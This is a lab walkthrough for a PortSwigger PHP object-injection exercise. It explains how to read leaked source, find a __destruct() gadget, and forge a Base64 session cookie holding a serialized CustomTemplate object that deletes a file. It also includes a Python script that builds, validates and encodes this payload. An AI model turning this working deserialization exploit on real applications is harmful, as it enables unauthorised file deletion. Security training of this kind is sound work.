18.4 Lab: Arbitrary object injection in PHP
This lab uses a serialization-based session mechanism and is vulnerable to arbitrary object injection as a result. To solve the lab, create and inject a malicious serialized object to delete the morale.txt file from Carlos’s home directory. You will need to obtain source code access to solve this lab | Karthikeyan Nagaraj
Jul 2, 2024
Description
This lab uses a serialization-based session mechanism and is vulnerable to arbitrary object injection as a result. To solve the lab, create and inject a malicious serialized object to delete the morale.txt file from Carlos's home directory. You will need to obtain source code access to solve this lab.
You can log in to your own account using the following credentials: wiener:peter
Solution
- Log in to your own account and notice that the session cookie contains a serialized PHP object (it is Base64-encoded; Burp's Inspector panel decodes it for you).
- In the Target tab, open the site map and notice that the website references the file `/libs/CustomTemplate.php`. Right-click the file and select "Send to Repeater".
- In Burp Repeater, notice that you can read the source code by appending a tilde (`~`) to the filename in the request line, i.e. requesting `/libs/CustomTemplate.php~`. This is an editor backup copy left on the server; because the name does not end in `.php`, the server returns its contents as text instead of executing it.
- In the source code, notice that the `CustomTemplate` class contains the `__destruct()` magic method. It calls the `unlink()` function on the `lock_file_path` attribute, which deletes whatever file is at that path.
- In Burp Decoder, use the correct syntax for serialized PHP data to create a `CustomTemplate` object with the `lock_file_path` attribute set to `/home/carlos/morale.txt`. Make sure to use the correct data type labels and length indicators (the `s:` lengths are byte counts: `CustomTemplate` and `lock_file_path` are 14 bytes each, `/home/carlos/morale.txt` is 23; a miscount makes `unserialize()` reject the object). The final object should look like this:
  `O:14:"CustomTemplate":1:{s:14:"lock_file_path";s:23:"/home/carlos/morale.txt";}`
- Send the `/my-account` request to Repeater, select the session cookie, and paste the above object into the decoded value shown in the Inspector panel on the right-hand side.
- Click "Apply changes" so the Inspector re-encodes the cookie, then send the request. When PHP unserializes the cookie and the injected object is later destroyed, the `__destruct()` magic method is automatically invoked and deletes Carlos's file.
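To make the payload construction concrete, here is an added Python example (not part of the original write-up or of the PortSwigger lab) that builds the serialized `CustomTemplate` object with correct byte-length prefixes, validates it with a strict parser so a miscounted length is caught before the request is sent, and wraps it in the Base64 + URL-encoded form the lab's session cookie uses. The class name, attribute and target path come from the steps above; the function names, the parser and the malformed sample payload are this example's own.

```python
import base64
import re
from urllib.parse import quote, unquote


def php_serialize_string(value: str) -> str:
    # PHP's s:<n> prefix is a byte count, so measure after UTF-8 encoding.
    return f's:{len(value.encode("utf-8"))}:"{value}";'


def php_serialize_object(class_name: str, props: dict) -> str:
    # Public string properties only: O:<len>:"<class>":<count>:{<key><value>...}
    # (private/protected names need NUL-delimited prefixes, not handled here).
    body = "".join(php_serialize_string(k) + php_serialize_string(v)
                   for k, v in props.items())
    return (f'O:{len(class_name.encode("utf-8"))}:"{class_name}":'
            f'{len(props)}:{{{body}}}')


def _read_string(buf: bytes, pos: int):
    # Expect s:<n>:"<exactly n bytes>"; and return (value, offset after ';').
    m = re.match(rb's:(\d+):"', buf[pos:])
    if not m:
        raise ValueError(f"expected string token at offset {pos}")
    n = int(m.group(1))
    start = pos + m.end()
    end = start + n
    if buf[end:end + 2] != b'";':
        raise ValueError(f"declared length {n} does not match payload at offset {pos}")
    return buf[start:end].decode("utf-8"), end + 2


def parse_php_object(data: str):
    # Strict check for a single-level object of string properties; raises
    # ValueError on exactly the length mistakes that make unserialize() fail.
    buf = data.encode("utf-8")
    m = re.match(rb'O:(\d+):"', buf)
    if not m:
        raise ValueError("not a serialized object")
    n = int(m.group(1))
    start = m.end()
    class_name = buf[start:start + n].decode("utf-8")
    pos = start + n
    m2 = re.match(rb'":(\d+):\{', buf[pos:])
    if not m2:
        raise ValueError("bad class-name length or property count")
    count = int(m2.group(1))
    pos += m2.end()
    props = {}
    for _ in range(count):
        key, pos = _read_string(buf, pos)
        value, pos = _read_string(buf, pos)
        props[key] = value
    if buf[pos:] != b"}":
        raise ValueError("trailing data or missing closing brace")
    return class_name, props


def build_session_cookie(serialized: str) -> str:
    # The lab's cookie is Base64, then URL-encoded ('=' padding becomes %3D),
    # which is what Burp's Inspector does when you click "Apply changes".
    b64 = base64.b64encode(serialized.encode("utf-8")).decode("ascii")
    return quote(b64, safe="")


def decode_session_cookie(cookie: str) -> str:
    return base64.b64decode(unquote(cookie)).decode("utf-8")


def lab_payload() -> str:
    # Gadget from the write-up: __destruct() unlinks lock_file_path.
    return php_serialize_object("CustomTemplate",
                                {"lock_file_path": "/home/carlos/morale.txt"})


if __name__ == "__main__":
    payload = lab_payload()
    print(payload)
    print(parse_php_object(payload))          # validates lengths before sending
    cookie = build_session_cookie(payload)
    print("Cookie: session=" + cookie)
    assert decode_session_cookie(cookie) == payload
```

Run the script and paste the printed `session=` value into the Cookie header of the `/my-account` request; the parser step is there because a single off-by-one in an `s:` length silently produces a cookie that PHP rejects, leaving you to guess why the file was not deleted.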
Thank you for Reading!
Happy Ethical Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng